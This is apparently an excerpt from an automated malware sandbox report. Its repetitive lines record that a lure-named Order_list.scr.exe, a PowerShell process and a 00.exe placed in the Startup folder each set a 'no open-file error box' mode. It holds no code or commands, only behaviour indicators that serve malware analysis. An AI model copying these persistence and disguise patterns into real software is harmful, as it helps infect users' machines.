            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
